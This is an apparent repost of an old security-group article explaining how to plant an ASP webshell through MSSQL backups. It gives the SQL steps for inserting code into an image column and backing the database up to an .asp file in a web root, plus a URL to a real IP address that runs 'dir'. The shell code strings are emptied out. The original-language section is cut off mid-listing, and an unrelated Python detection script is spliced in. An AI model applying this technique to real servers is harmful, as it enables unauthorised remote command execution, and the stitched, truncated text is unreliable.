Get an ASP with Backup

xiaoxiao2021-03-06  63

This article is about how to get a webshell through SQL injection against an MSSQL database. The method has worked well since the day I found it (July 2003). You do not need the sa privilege; being a dbowner is enough.

Open your Query Analyzer. The following steps will generate a strange but usable webshell (suppose your web root is g:/wwwtest and the database model is intact):

use model;
create table cmd (str image);
insert into cmd (str) values ('');
backup database model to disk = 'g:/wwwtest/l.asp';

Click Run, and the database model is backed up into the web publishing directory. Download it? No, visit the file and you have got the shell:

http://202.119.9.42/l.asp?c=dir

Here is the explanation. The ASP (VB) interpreter ignores all characters that are not between "<%" and "%>", so naming the backup file .asp and visiting it will not cause a 500 error as long as the backup file contains no stray "<%" or "%>". By default, the database stores its data in a "loose" way (e.g. the stored string "time" appears in the backup file as "t i m e"), so the probability that the backup file contains "<%" or "%>" is low. These are the two preconditions.

But how can we make it a webshell? The image (or binary) type is stored differently: its data appears in the backup file exactly as we wrote it. That is, whatever we insert into a column of type image is not output in the "loose" way in the backup file, but in its original format. Once we create a table with an image column and insert some evil code, we can back up a shell.

There are also some cons:

1) The output directory must be the physical web directory. Usually we can only guess it. For a virtual host, perhaps we can reveal the path through other sites or in other ways.
2) The database user must have the backup privilege. Some abnormal webmasters grant only the select and insert privileges; once you meet such a webmaster, abandon this way.

Here are the pros:

1) It gives you the webshell once you have the backup privilege. A dbowner has that!
2) It gives a new method of planting a backdoor. Suppose your database is Access and you name it .asp to prevent it from being downloaded. It could be a webshell ;)

Oh, I nearly forgot the most important thing: data from different insert statements are not contiguous in the backup file, which means that if your webshell code is too long, you should do as follows:

========= cut me here =========
use model
create table cmd (str image);
insert into cmd (str) values ('');
insert into cmd (str) values ('');
insert into cmd (str) values ('');
insert into cmd (str) values ('');
insert into cmd (str) values ('');
insert into cmd (str) values ('');
insert into cmd (str) values ('');
insert into cmd (str) values ('');
insert into cmd (str) values ('');
insert into cmd (str) values ('');
insert into cmd (str) values ('');
insert into cmd (str) values ('');
insert into cmd (str) values ('');
insert into cmd (str) values ('" method="POST">');
insert into cmd (str) values ('');
insert into cmd (str) values ('');
insert into cmd (str) values ('');
insert into cmd (str) values ('');
insert into cmd (str) values ('');
insert into cmd (str) values (' ');
insert into cmd (str) values (' ');
insert into cmd (str) values ('');
backup database model to disk = 'c:/l.asp';
========= cut me here =========

To those who did not successfully get the shell: make sure your testing database (e.g. model) is intact.

To those who surf on the web: declare @a sysname; select @a = db_name()

To those who think it is too simple: try backing up the log, or think about how to access all files in a similar way ;)

Greets: all SST members.

Editor: the above is a rough translation for the convenience of friends whose English is not good. The original text follows.

[Backup a shell]
From: SST (www.0x557.org)
Author: SWAN (Swan [at] 0x557 [dot] org)

This article is about how to get a webshell when SQL injecting under an MSSQL database. The method seems to work well since the day I found her (July 2003). You do not need the sa privilege, just a dbowner is okay.

Open your Query Analyzer; the following steps will generate a strange but usable webshell (suppose your web root is g:/wwwtest and the database model is intact):

use model;
create table cmd (str image);
insert into cmd (str) values ('');
backup database model to disk = 'g:/wwwtest/l.asp';

Click Run and the database model has been backed up into the web publish directory. Download? No, visit this file, you have got the shell...

http://202.119.9.42/l.asp?c=dir

Here is the explanation: the ASP (VB) interpreter will ignore the characters that are not between "<%" and "%>", so naming the backup file as .asp and visiting it won't cause a 500 error if the backup file contains no "<%" or "%>". By default, the database stores its data in a "loose" way (e.g. the stored string "time" will be seen in the backup file as "t i m e"), so the probability that the backup file contains "<%" or "%>" is low. These are the two preconditions.

But how could we make it a webshell? The storage mode of the image or bin type is different: the data in the backup file appears in exactly the format we wrote, that is, what we insert into the table/database with the type of image will NOT be output in the "loose" way in the backup file, but in the original format. Once we create a table with an image segment and insert some evil code, we could back up a shell!

Er, here also are some cons:

1) The output directory should be the physical web directory. Usually, we can only guess. For a virtual host, perhaps we could reveal the path in other sites and other ways.
2) The database visitor should have the backup privilege. Some abnormal webmasters gave only the select and insert privileges; once you meet such a webmaster, abandon this way.

Here are the pros:

1) It will give you the webshell once you have the backup privilege. A dbowner has that!
2) It gives a new method of putting a backdoor. Suppose your database is Access, and you name it .asp to prevent it from being downloaded. It could be a webshell ;)
3) ...

Oh, I nearly forgot the most important thing: data which are in different insert phrases are not tangent, which means that if your webshell code is too long, you should do as follows:

========= cut me here =========
use model
create table cmd (str image);
insert into cmd (str) values (' ');
insert into cmd (str) values (' ');
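The "loose" versus image storage difference explained above also gives defenders something to look for. The following Python check is an added example, not part of the original article or of the author's code: it flags script-extension files under a web root that are really database backups. The function names, the constructed sample bytes and the "TAPE" header value (assumed here to be the first bytes of an uncompressed native SQL Server backup) are assumptions of this example.

```python
import os

SCRIPT_EXTS = {".asp", ".asa", ".aspx"}   # extensions the web server hands to a script engine
MTF_MAGIC = b"TAPE"                       # assumption: first bytes of an uncompressed native SQL Server backup
UTF16_BOMS = (b"\xff\xfe", b"\xfe\xff")   # legitimate UTF-16 script files start with one of these

def stored_forms(text):
    """Bytes of `text` as a Unicode ("loose") string and as raw image data."""
    return text.encode("utf-16-le"), text.encode("ascii")

def classify(data):
    """Return the reasons a script-extension file looks like a database backup."""
    reasons = []
    if data.startswith(MTF_MAGIC):
        reasons.append("mtf-backup-header")
    if data and not data.startswith(UTF16_BOMS) and data.count(0) / len(data) > 0.05:
        reasons.append("binary-content")
    # A contiguous delimiter inside binary data is what makes the interpreter run it.
    if reasons and b"<%" in data:
        reasons.append("contiguous-script-delimiter")
    return reasons

def scan_web_root(root, head=1 << 20):
    """Map path -> reasons for suspicious script-extension files under `root`.
    Only the first `head` bytes of each file are inspected."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                reasons = classify(fh.read(head))
            if reasons:
                findings[path] = reasons
    return findings

# Constructed sample: an inert marker stored both ways behind a fake backup header.
LOOSE, RAW = stored_forms("<% marker %>")
FAKE_BACKUP = MTF_MAGIC + b"\x00" * 64 + LOOSE + RAW

if __name__ == "__main__":
    print(b"<%" in LOOSE, b"<%" in RAW)   # the loose form splits the delimiter
    print(classify(FAKE_BACKUP))
    print(classify(b"<% Response.Write(1) %>"))
```

Any hit from scan_web_root is worth correlating with the database server's backup history, since the cons listed in the article mean the technique only works when the database account holds the backup privilege and can write into the web directory.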

Please credit the original address when reposting: https://www.9cbs.com/read-91016.html
